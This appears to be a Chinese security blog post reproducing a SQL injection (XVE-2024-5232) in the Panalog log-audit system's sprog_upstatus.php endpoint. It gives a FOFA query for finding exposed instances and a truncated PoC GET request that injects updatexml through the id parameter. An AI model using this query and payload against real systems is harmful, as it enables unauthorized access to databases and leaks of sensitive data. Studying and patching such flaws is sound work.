Panalog 日志审计系统 sprog_upstatus.php SQL 注入漏洞复现(XVE-2024-5232)
发布日期:2025-05-01 15:17:17 浏览次数:1 分类:技术文章

本文共 375 字,大约阅读时间需要 1 分钟。

0x01 产品简介

Panalog大数据系统定位于将大数据产品应用于高校、 公安、 政企、 医疗、 金融、 能源等行业之中,针对网络流量的信息进行日志留存,可对用户上网行为进行审计,逐渐形成大数据采集、 大数据分析、 大数据整合的工作模式,为各种网络用户提供服务。

0x02 漏洞概述

Panabit /Maintain/sprog_upstatus.php 接口处的 id 参数存在 SQL 注入漏洞,可导致数据库信息泄露从而获取敏感信息,甚至可能被攻击者进一步利用造成更大危害。

0x03 复现环境

FOFA:body="Maintain/cloud_index.php"

0x04 漏洞复现

PoC

GET /Maintain/sprog_upstatus.php?status=1&rdb=1&id=1%20and%20updatexml(1
上一篇:Panalog 日志审计系统 前台RCE漏洞复现
下一篇:Panalog 日志审计系统 sprog_deletevent.php SQL 注入漏洞复现

发表评论

最新留言

表示我来过!
[***.240.166.169]2025年04月09日 21时58分00秒

关于作者

    喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!

推荐文章